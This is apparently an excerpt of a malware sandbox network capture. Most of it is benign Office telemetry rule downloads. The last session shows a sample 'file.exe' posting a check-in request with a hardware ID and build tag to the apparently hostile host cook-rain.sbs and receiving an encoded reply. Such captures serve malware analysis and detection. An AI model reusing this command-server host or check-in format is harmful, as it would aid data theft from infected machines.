                                                                                                                                                                        2024-11-21 09:37:39 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        60192.168.2.64977213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:39 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                        x-ms-request-id: 5b8b83f7-201e-0033-0b8c-3ab167000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093739Z-1777c6cb754gc8g6hC1TEB966c0000000asg00000000kehr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        61192.168.2.64977413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:40 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:40 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                        x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093740Z-178bfbc474b7cbwqhC1NYC8z4n000000015g000000008v40
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:40 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        62192.168.2.64977313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:40 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:40 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                        x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093740Z-178bfbc474b9fdhphC1NYCac0n000000015g00000000a3hy
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        63192.168.2.64977513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:40 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:40 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                        x-ms-request-id: b82dc135-b01e-0053-1a8c-3acdf8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093740Z-r1d97b995777mdbwhC1TEBezag0000000a6g000000004bea
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        64192.168.2.64977613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:41 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:41 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                        x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093741Z-r1d97b99577656nchC1TEBk98c0000000a3g00000000d9gx
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        65192.168.2.64977713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:41 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                        x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093742Z-178bfbc474bbbqrhhC1NYCvw7400000001g00000000039hn
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        66192.168.2.64977913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:42 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:42 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                        x-ms-request-id: 449238ea-501e-0029-7d7c-3bd0b8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093742Z-1777c6cb754ww792hC1TEBzqu40000000aug000000002rqv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        67192.168.2.64977813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:42 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                        x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093742Z-178bfbc474bbcwv4hC1NYCypys000000014g0000000075m7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        68192.168.2.649781188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:42 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:42 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=91B05E1AE1EF882D63CFCF7E6C45F838
                                                                                                                                                                        2024-11-21 09:37:43 UTC984INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:43 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=9amigqtot063ek82asqlbskjfv; expires=Mon, 17-Mar-2025 03:24:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8o7T0UHOFwCHkjIqjKHor%2B4p7pqzgB2TbK9OQTcv9wuB0SPBPp2BR4dYYR9X3F8iJ8U1IWk%2F85UBvgJnJjjKNdslsNeD%2BzKG0iCS4QtSPbESwHOC%2FkIRhxu%2Feqydmo5i"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb3e25bbdc427-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=985&delivery_rate=1696687&cwnd=243&unsent_bytes=0&cid=eceae28eb360896e&ts=701&x=0"
                                                                                                                                                                        2024-11-21 09:37:43 UTC214INData Raw: 64 30 0d 0a 4d 58 32 42 34 4d 51 56 53 51 54 7a 4c 49 70 61 58 32 6c 39 4d 4d 41 69 52 64 72 5a 63 33 4d 43 62 76 50 4c 50 71 4b 64 74 2b 5a 71 42 71 4f 56 35 69 39 72 62 49 64 59 2b 6d 41 44 52 69 45 66 38 52 70 77 39 4f 74 43 52 69 78 66 77 76 67 51 6b 36 76 72 79 56 34 62 35 37 7a 72 63 53 78 69 33 55 6e 79 50 33 31 46 58 31 61 30 41 48 2f 71 39 56 45 57 49 46 54 43 74 68 4c 5a 76 38 4c 45 43 31 2f 70 6c 4c 42 6c 63 31 6a 63 63 4b 56 72 5a 31 78 54 41 76 45 58 61 2b 76 6f 51 46 30 7a 57 4b 2f 6b 54 64 62 34 31 6f 74 74 55 76 4f 42 71 6e 45 6d 61 64 31 4a 38 6a 39 39 52 56 39 57 74 41 42 2f 36 76 56 52 46 69 42 55 77 72 5a 6a 0d 0a
